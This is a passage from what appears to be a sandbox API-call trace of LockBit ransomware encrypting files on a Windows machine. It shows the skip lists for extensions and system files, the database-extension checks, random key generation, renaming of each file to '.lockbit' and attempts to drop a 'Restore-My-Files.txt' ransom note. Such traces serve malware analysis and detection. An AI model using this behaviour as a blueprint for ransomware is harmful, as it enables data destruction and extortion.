returned 1 [0106.371] lstrcmpiW (lpString1="ntldr", lpString2="BD09664_.WMF") returned 1 [0106.371] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD09664_.WMF") returned 1 [0106.371] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD09664_.WMF") returned 1 [0106.371] lstrcmpiW (lpString1="autorun.inf", lpString2="BD09664_.WMF") returned -1 [0106.371] lstrcmpiW (lpString1="thumbs.db", lpString2="BD09664_.WMF") returned 1 [0106.371] lstrcmpiW (lpString1="iconcache.db", lpString2="BD09664_.WMF") returned 1 [0106.371] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.371] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned=".WMF" [0106.371] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.371] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.372] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.372] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.lockbit") returned 72 [0106.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.373] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.373] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.373] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7966) returned 1 [0106.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.374] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.379] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.379] malloc (_Size=0xa6) returned 0x77d800 [0106.379] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.381] free (_Block=0x77d800) [0106.381] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.381] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.381] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.381] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c365a00, ftCreationTime.dwHighDateTime=0x1bd4f6a, ftLastAccessTime.dwLowDateTime=0x5f47ba90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4c365a00, ftLastWriteTime.dwHighDateTime=0x1bd4f6a, nFileSizeHigh=0x0, nFileSizeLow=0x34cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10890_.GIF", cAlternateFileName="")) returned 1 [0106.381] lstrcmpiW (lpString1=".", lpString2="BD10890_.GIF") returned -1 [0106.381] lstrcmpiW (lpString1="..", lpString2="BD10890_.GIF") returned -1 [0106.381] PathFindExtensionW (pszPath="BD10890_.GIF") returned=".GIF" [0106.381] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0106.381] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0106.381] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0106.381] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0106.381] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0106.381] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0106.381] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0106.381] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0106.381] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0106.381] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0106.382] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0106.382] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10890_.GIF") returned 1 [0106.383] lstrcmpiW (lpString1="ntldr", lpString2="BD10890_.GIF") returned 1 [0106.383] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10890_.GIF") returned 1 [0106.383] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10890_.GIF") returned 1 [0106.383] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10890_.GIF") returned -1 [0106.383] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10890_.GIF") returned 1 [0106.383] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10890_.GIF") returned 1 [0106.383] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.383] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned=".GIF" [0106.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0106.383] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0106.383] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0106.384] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0106.384] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.lockbit") returned 72 [0106.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.384] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.384] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.384] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13515) returned 1 [0106.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.386] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0106.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.394] malloc (_Size=0xa6) returned 0x77d800 [0106.394] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.394] free (_Block=0x77d800) [0106.394] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.395] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93701b00, ftCreationTime.dwHighDateTime=0x1bd4f69, ftLastAccessTime.dwLowDateTime=0x517da370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93701b00, ftLastWriteTime.dwHighDateTime=0x1bd4f69, nFileSizeHigh=0x0, nFileSizeLow=0x4edd, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10972_.GIF", cAlternateFileName="")) returned 1 [0106.395] lstrcmpiW (lpString1=".", lpString2="BD10972_.GIF") returned -1 [0106.395] lstrcmpiW (lpString1="..", lpString2="BD10972_.GIF") returned -1 [0106.395] PathFindExtensionW (pszPath="BD10972_.GIF") returned=".GIF" [0106.395] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0106.395] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0106.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0106.396] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0106.396] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0106.396] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0106.396] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0106.396] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0106.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10972_.GIF") returned 1 [0106.396] lstrcmpiW (lpString1="ntldr", lpString2="BD10972_.GIF") returned 1 [0106.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10972_.GIF") returned 1 [0106.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10972_.GIF") returned 1 [0106.396] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10972_.GIF") returned -1 [0106.397] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10972_.GIF") returned 1 [0106.397] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10972_.GIF") returned 1 [0106.397] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.397] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned=".GIF" [0106.397] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0106.397] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0106.397] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0106.397] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.lockbit") returned 72 [0106.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.399] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.399] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.399] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20189) returned 1 [0106.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.400] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.405] malloc (_Size=0xa6) returned 0x77d800 [0106.405] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.407] free (_Block=0x77d800) [0106.407] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.407] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.407] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.407] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6557800, ftCreationTime.dwHighDateTime=0x1bd4d57, ftLastAccessTime.dwLowDateTime=0x5190ae70, 